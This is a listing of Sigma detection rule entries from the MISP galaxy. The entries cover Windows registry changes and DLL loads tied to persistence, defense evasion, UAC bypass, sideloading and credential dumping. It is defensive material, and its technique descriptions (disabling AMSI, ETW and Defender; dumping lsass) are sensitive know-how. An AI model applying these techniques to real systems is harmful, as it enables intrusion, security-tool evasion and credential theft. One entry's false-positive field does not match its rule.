tags ['attack.persistence', 'attack.t1547.010']
Related clusters

To see the related clusters, click here.

Enable Microsoft Dynamic Data Exchange

Detects registry changes that enable the Dynamic Data Exchange (DDE) protocol in all supported editions of Microsoft Word or Excel.

Internal MISP references

UUID 63647769-326d-4dde-a419-b925cc0caf42 which can be used as unique global reference for Enable Microsoft Dynamic Data Exchange in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/26
falsepositive ['Unknown']
filename registry_set_office_enable_dde.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.execution', 'attack.t1559.002']
Related clusters

To see the related clusters, click here.

New Application in AppCompat

A general detection for a new application in AppCompat, which indicates an application executing for the first time on an endpoint.

Internal MISP references

UUID 60936b49-fca0-4f32-993d-7415edcf9a5d which can be used as unique global reference for New Application in AppCompat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['This rule is to explore new applications on an endpoint. False positives depends on the organization.', 'Newly setup system.', 'Legitimate installation of new application.']
filename registry_set_new_application_appcompat.yml
level informational
logsource.category registry_set
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']

Windows Defender Service Disabled - Registry

Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry

Internal MISP references

UUID e1aa95de-610a-427d-b9e7-9b46cfafbe6a which can be used as unique global reference for Windows Defender Service Disabled - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali
creation_date 2022/08/01
falsepositive ['Administrator actions']
filename registry_set_disable_windows_defender_service.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

ScreenSaver Registry Key Set

Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl

Internal MISP references

UUID 40b6e656-4e11-4c0c-8772-c1cc6dae34ce which can be used as unique global reference for ScreenSaver Registry Key Set in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
creation_date 2022/05/04
falsepositive ['Legitimate use of screen saver']
filename registry_set_scr_file_executed_by_rundll32.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']

Hypervisor Enforced Code Integrity Disabled

Detects changes to the HypervisorEnforcedCodeIntegrity registry key where the "Enabled" value is set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code into the kernel.

Internal MISP references

UUID 8b7273a4-ba5d-4d8a-b04f-11f2900d043a which can be used as unique global reference for Hypervisor Enforced Code Integrity Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Anish Bogati
creation_date 2023/03/14
falsepositive ['Unknown']
filename registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

Potential Persistence Via Outlook Today Pages

Detects potential persistence activity via Outlook Today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry value "UserDefinedUrl".

Internal MISP references

UUID 487bb375-12ef-41f6-baae-c6a1572b4dd1 which can be used as unique global reference for Potential Persistence Via Outlook Today Pages in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tobias Michalski (Nextron Systems)
creation_date 2021/06/10
falsepositive ['Unknown']
filename registry_set_persistence_outlook_todaypage.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1112']

Potential Persistence Via AutodialDLL

Detects changes to the "AutodialDLL" key, which could be used as a persistence method to load a custom DLL via the "ws2_32" library.

Internal MISP references

UUID e6fe26ee-d063-4f5b-b007-39e90aaf50e3 which can be used as unique global reference for Potential Persistence Via AutodialDLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/10
falsepositive ['Unlikely']
filename registry_set_persistence_autodial_dll.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Modify User Shell Folders Startup Value

Detects modification of the Startup key to a path where a payload could be stored to be launched during startup.

Internal MISP references

UUID 9c226817-8dc9-46c2-a58d-66655aafd7dc which can be used as unique global reference for Modify User Shell Folders Startup Value in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/01
falsepositive ['Unknown']
filename registry_set_susp_user_shell_folders.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1547.001']

Sysmon Driver Altitude Change

Detects changes in Sysmon driver altitude value. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.

Internal MISP references

UUID 4916a35e-bfc4-47d0-8e25-a003d7067061 which can be used as unique global reference for Sysmon Driver Altitude Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author B.Talebi
creation_date 2022/07/28
falsepositive ['Legitimate driver altitude change to hide sysmon']
filename registry_set_change_sysmon_driver_altitude.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

CurrentVersion Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID 20f0ee37-5942-4e45-b7d5-c5b5db9df5cd which can be used as unique global reference for CurrentVersion Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_currentversion.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']

Displaying Hidden Files Feature Disabled

Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. This technique is abused by several malware families to hide their files from normal users.

Internal MISP references

UUID 5a5152f1-463f-436b-b2f5-8eceb3964b42 which can be used as unique global reference for Displaying Hidden Files Feature Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/02
falsepositive ['Unknown']
filename registry_set_hide_file.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.001']

Registry Modification to Hidden File Extension

Detects hiding of file extensions through modification of the registry.

Internal MISP references

UUID 5df86130-4e95-4a54-90f7-26541b40aec2 which can be used as unique global reference for Registry Modification to Hidden File Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/22
falsepositive ['Administrative scripts']
filename registry_set_hidden_extention.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1137']

Bypass UAC Using SilentCleanup Task

Detects the setting of the environment variable "windir" to a non-default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup task, which runs %windir%\system32\cleanmgr.exe, is an auto-elevated task that can be abused to run any file with administrator privileges without prompting UAC.

Internal MISP references

UUID 724ea201-6514-4f38-9739-e5973c34f49a which can be used as unique global reference for Bypass UAC Using SilentCleanup Task in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nextron Systems
creation_date 2022/01/06
falsepositive ['Unknown']
filename registry_set_bypass_uac_using_silentcleanup_task.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1548.002']

ClickOnce Trust Prompt Tampering

Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.

Internal MISP references

UUID ac9159cc-c364-4304-8f0a-d63fc1a0aabb which can be used as unique global reference for ClickOnce Trust Prompt Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SerkinValery, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/12
falsepositive ['Legitimate internal requirements.']
filename registry_set_clickonce_trust_prompt.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

Suspicious Service Installed

Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)

Internal MISP references

UUID f2485272-a156-4773-82d7-1d178bc4905b which can be used as unique global reference for Suspicious Service Installed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author xknow (@xknow_infosec), xorxes (@xor_xes)
creation_date 2019/04/08
falsepositive ["Other legitimate tools using these service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it."]
filename registry_set_susp_service_installed.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.t1562.001', 'attack.defense_evasion']

Disable Macro Runtime Scan Scope

Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros

Internal MISP references

UUID ab871450-37dc-4a3a-997f-6662aa8ae0f1 which can be used as unique global reference for Disable Macro Runtime Scan Scope in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/25
falsepositive ['Unknown']
filename registry_set_disable_macroruntimescanscope.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

DNS-over-HTTPS Enabled by Registry

Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or to hide the process of exfiltrating data. With this enabled, organizations lose visibility into data such as query type, response and originating IP that are used to identify bad actors.

Internal MISP references

UUID 04b45a8a-d11d-49e4-9acc-4a1b524407a5 which can be used as unique global reference for DNS-over-HTTPS Enabled by Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/07/22
falsepositive ['Unlikely']
filename registry_set_dns_over_https_enabled.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1140', 'attack.t1112']

Potential WerFault ReflectDebugger Registry Value Abuse

Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.

Internal MISP references

UUID 0cf2e1c6-8d10-4273-8059-738778f981ad which can be used as unique global reference for Potential WerFault ReflectDebugger Registry Value Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior
creation_date 2023/05/18
falsepositive ['Unknown']
filename registry_set_persistence_reflectdebugger.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003']

Disable Windows Security Center Notifications

Detects the UseActionCenterExperience value being set to 0 in order to disable Windows Security Center notifications.

Internal MISP references

UUID 3ae1a046-f7db-439d-b7ce-b8b366b81fa6 which can be used as unique global reference for Disable Windows Security Center Notifications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/19
falsepositive ['Unknown']
filename registry_set_disable_security_center_notifications.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

Potential Persistence Via Event Viewer Events.asp

Detects potential registry persistence technique using the Event Viewer "Events.asp" technique

Internal MISP references

UUID a1e11042-a74a-46e6-b07c-c4ce8ecc239b which can be used as unique global reference for Potential Persistence Via Event Viewer Events.asp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/17
falsepositive ['Unknown']
filename registry_set_persistence_event_viewer_events_asp.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.t1112']

Hide Schedule Task Via Index Value Tamper

Detects when the "Index" value of a scheduled task is modified in the registry, which effectively hides it from tooling such as "schtasks /query" (read the referenced link for more information about the effects of this technique).

Internal MISP references

UUID 5b16df71-8615-4f7f-ac9b-6c43c0509e61 which can be used as unique global reference for Hide Schedule Task Via Index Value Tamper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/26
falsepositive ['Unlikely']
filename registry_set_hide_scheduled_task_via_index_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']

Potential AutoLogger Sessions Tampering

Detects tampering with AutoLogger trace sessions, a technique used by attackers to disable logging.

Internal MISP references

UUID f37b4bce-49d0-4087-9f5b-58bffda77316 which can be used as unique global reference for Potential AutoLogger Sessions Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/01
falsepositive ['Unknown']
filename registry_set_disable_autologger_sessions.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

ETW Logging Disabled In .NET Processes - Sysmon Registry

Detects potential adversaries stopping ETW providers from recording loaded .NET assemblies.

Internal MISP references

UUID bf4fc428-dcc3-4bbd-99fe-2422aeee2544 which can be used as unique global reference for ETW Logging Disabled In .NET Processes - Sysmon Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/06/05
falsepositive ['Unknown']
filename registry_set_dot_net_etw_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112', 'attack.t1562']

Potential Persistence Via COM Hijacking From Suspicious Locations

Detects potential COM object hijacking where the "Server" (InprocServer/LocalServer) value points to a suspicious or unusual location.

Internal MISP references

UUID 3d968d17-ffa4-4bc0-bfdc-f139de76ce77 which can be used as unique global reference for Potential Persistence Via COM Hijacking From Suspicious Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/28
falsepositive ['Probable legitimate applications. If you find these please add them to an exclusion list']
filename registry_set_persistence_com_hijacking_susp_locations.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.015']

Internet Explorer Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID a80f662f-022f-4429-9b8c-b1a41aaa6688 which can be used as unique global reference for Internet Explorer Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_internet_explorer.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']

Potential Credential Dumping Attempt Using New NetworkProvider - REG

Detects when an attacker tries to add a new network provider in order to dump cleartext credentials, similar to how the NPPSpy tool does it.

Internal MISP references

UUID 0442defa-b4a2-41c9-ae2c-ea7042fc4701 which can be used as unique global reference for Potential Credential Dumping Attempt Using New NetworkProvider - REG in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/23
falsepositive ['Other legitimate network providers used and not filtered in this rule']
filename registry_set_new_network_provider.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.credential_access', 'attack.t1003']

Potential Ransomware Activity Using LegalNotice Message

Detects changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom notes.

Internal MISP references

UUID 8b9606c9-28be-4a38-b146-0e313cc232c1 which can be used as unique global reference for Potential Ransomware Activity Using LegalNotice Message in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/11
falsepositive ['Unknown']
filename registry_set_legalnotice_susp_message.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.impact', 'attack.t1491.001']

Disable Internal Tools or Feature in Registry

Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)

Internal MISP references

UUID e2482f8d-3443-4237-b906-cc145d87a076 which can be used as unique global reference for Disable Internal Tools or Feature in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec
creation_date 2022/03/18
falsepositive ['Legitimate admin script']
filename registry_set_disable_function_user.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

Potential AMSI COM Server Hijacking

Detects changes to the AMSI COM server registry key in order to disable AMSI scanning functionality. When AMSI attempts to start its COM component, it queries the registered CLSID and is returned a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless.

Internal MISP references

UUID 160d2780-31f7-4922-8b3a-efce30e63e96 which can be used as unique global reference for Potential AMSI COM Server Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/04
falsepositive ['Unknown']
filename registry_set_amsi_com_hijack.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

Register New IFiltre For Persistence

Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.

Internal MISP references

UUID b23818c7-e575-4d13-8012-332075ec0a2b which can be used as unique global reference for Register New IFiltre For Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Legitimate registration of IFilters by the OS or software']
filename registry_set_persistence_ifilter.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

VBScript Payload Stored in Registry

Detects VBScript content stored into registry keys as seen being used by UNC2452 group

Internal MISP references

UUID 46490193-1b22-4c29-bdd6-5bf63907216f which can be used as unique global reference for VBScript Payload Stored in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/03/05
falsepositive ['Unknown']
filename registry_set_vbs_payload_stored.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']

Potential Persistence Via TypedPaths

Detects modification of or addition to the 'TypedPaths' key in the user or admin registry hive by a non-standard application, which might indicate a persistence attempt.

Internal MISP references

UUID 086ae989-9ca6-4fe7-895a-759c5544f247 which can be used as unique global reference for Potential Persistence Via TypedPaths in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/22
falsepositive ['Unlikely']
filename registry_set_persistence_typed_paths.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

ServiceDll Hijack

Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence.

Internal MISP references

UUID 612e47e9-8a59-43a6-b404-f48683f45bd6 which can be used as unique global reference for ServiceDll Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/04
falsepositive ['Administrative scripts', 'Installation of a service']
filename registry_set_servicedll_hijack.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1543.003']

Unsigned Module Loaded by ClickOnce Application

Detects unsigned module load by ClickOnce application.

Internal MISP references

UUID 060d5ad4-3153-47bb-8382-43e5e29eda92 which can be used as unique global reference for Unsigned Module Loaded by ClickOnce Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SerkinValery
creation_date 2023/06/08
falsepositive ['Unlikely']
filename image_load_susp_clickonce_unsigned_module_loaded.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.persistence', 'attack.t1574.002']

Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded

Detects the load of the dbghelp/dbgcore DLLs (used to create memory dumps) by suspicious processes. Tools like ProcessHacker and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, the SilentTrinity C2 framework has a module that leverages this API to dump the contents of lsass.exe and transfer it over the network back to the attacker's machine.

Internal MISP references

UUID bdc64095-d59a-42a2-8588-71fd9c9d9abc which can be used as unique global reference for Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Perez Diego (@darkquassar), oscd.community, Ecco
creation_date 2019/10/27
falsepositive ['Unknown']
filename image_load_dll_dbghelp_dbgcore_unsigned_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']

WMIC Loading Scripting Libraries

Detects threat actors proxy-executing code and bypassing application controls by leveraging wmic and the /FORMAT argument switch to download and execute an XSL file (i.e. js, vbs, etc.).

Internal MISP references

UUID 06ce37c2-61ab-4f05-9ff5-b1a96d18ae32 which can be used as unique global reference for WMIC Loading Scripting Libraries in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/10/17
falsepositive ['The command wmic os get lastboottuptime loads vbscript.dll', 'The command wmic os get locale loads vbscript.dll', "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights"]
filename image_load_wmic_remote_xsl_scripting_dlls.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1220']

Potential Goopdate.DLL Sideloading

Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe

Internal MISP references

UUID b6188d2f-b3c4-4d2c-a17d-9706e0851af0 which can be used as unique global reference for Potential Goopdate.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/15
falsepositive ['False positives are expected from Google Chrome installations running from user locations (AppData) and other custom locations. Apply additional filters accordingly.', 'Other third party chromium browsers located in AppData']
filename image_load_side_load_goopdate.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

Potential appverifUI.DLL Sideloading

Detects potential DLL sideloading of "appverifUI.dll"

Internal MISP references

UUID ee6cea48-c5b6-4304-a332-10fc6446f484 which can be used as unique global reference for Potential appverifUI.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/20
falsepositive ['Unlikely']
filename image_load_side_load_appverifui.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

Potential EACore.DLL Sideloading

Detects potential DLL sideloading of "EACore.dll"

Internal MISP references

UUID edd3ddc3-386f-4ba5-9ada-4376b2cfa7b5 which can be used as unique global reference for Potential EACore.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/08/03
falsepositive ['Unlikely']
filename image_load_side_load_eacore.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

Potential 7za.DLL Sideloading

Detects potential DLL sideloading of "7za.dll"

Internal MISP references

UUID 4f6edb78-5c21-42ab-a558-fd2a6fc1fd57 which can be used as unique global reference for Potential 7za.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior
creation_date 2023/06/09
falsepositive ['Legitimate third party application located in "AppData" may leverage this DLL to offer 7z compression functionality and may generate false positives. Apply additional filters as needed.']
filename image_load_side_load_7za.yml
level low
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load

Detects the WMI script host process "scrcons.exe" loading scripting DLLs, which can indicate WMI ActiveScriptEventConsumer activity.

Internal MISP references

UUID b439f47d-ef52-4b29-9a2f-57d8a96cb6b8 which can be used as unique global reference for WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/09/02
falsepositive ['Legitimate event consumers', 'Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button']
filename image_load_scrcons_wmi_scripteventconsumer.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.lateral_movement', 'attack.privilege_escalation', 'attack.persistence', 'attack.t1546.003']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Via comctl32.dll

Detects potential DLL sideloading using comctl32.dll to obtain system privileges

Internal MISP references

UUID 6360757a-d460-456c-8b13-74cf0e60cceb which can be used as unique global reference for Potential DLL Sideloading Via comctl32.dll in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)
creation_date 2022/12/16
falsepositive ['Unlikely']
filename image_load_side_load_comctl32.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Suspicious WSMAN Provider Image Loads

Detects signs of potential use of the WSMAN provider by uncommon processes, both for local use and for remote execution.

Internal MISP references

UUID ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94 which can be used as unique global reference for Suspicious WSMAN Provider Image Loads in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/06/24
falsepositive ['Unknown']
filename image_load_wsman_provider_image_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.lateral_movement', 'attack.t1021.003']
Related clusters

To see the related clusters, click here.

Potential ShellDispatch.DLL Sideloading

Detects potential DLL sideloading of "ShellDispatch.dll"

Internal MISP references

UUID 844f8eb2-610b-42c8-89a4-47596e089663 which can be used as unique global reference for Potential ShellDispatch.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/20
falsepositive ['Some installers may trigger some false positives']
filename image_load_side_load_shelldispatch.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential RjvPlatform.DLL Sideloading From Default Location

Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary. This can be abused for DLL sideloading because the "$SysReset" directory the DLL is loaded from isn't created by default, so an attacker can create it and plant their own DLL there.

Internal MISP references

UUID 259dda31-b7a3-444f-b7d8-17f96e8a7d0d which can be used as unique global reference for Potential RjvPlatform.DLL Sideloading From Default Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/09
falsepositive ['Unknown']
filename image_load_side_load_rjvplatform_default_location.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Suspicious Volume Shadow Copy Vssapi.dll Load

Detects the image load of the VSS DLL "vssapi.dll" by uncommon executables

Internal MISP references

UUID 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8 which can be used as unique global reference for Suspicious Volume Shadow Copy Vssapi.dll Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/31
falsepositive ['Unknown']
filename image_load_dll_vssapi_susp_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Suspicious Renamed Comsvcs DLL Loaded By Rundll32

Detects rundll32 loading a renamed comsvcs.dll to dump process memory

Internal MISP references

UUID 8cde342c-ba48-4b74-b615-172c330f2e93 which can be used as unique global reference for Suspicious Renamed Comsvcs DLL Loaded By Rundll32 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/14
falsepositive ['Unlikely']
filename image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.credential_access', 'attack.defense_evasion', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

UAC Bypass With Fake DLL

Detects an attempt to load dismcore.dll after it has been dropped, a UAC bypass technique that abuses the DISM binary.

Internal MISP references

UUID a5ea83a7-05a5-44c1-be2e-addccbbd8c03 which can be used as unique global reference for UAC Bypass With Fake DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Dmitry Uchakin
creation_date 2020/10/06
falsepositive ['Actions of a legitimate telnet client']
filename image_load_uac_bypass_via_dism.yml
level high
logsource.category image_load
logsource.product windows
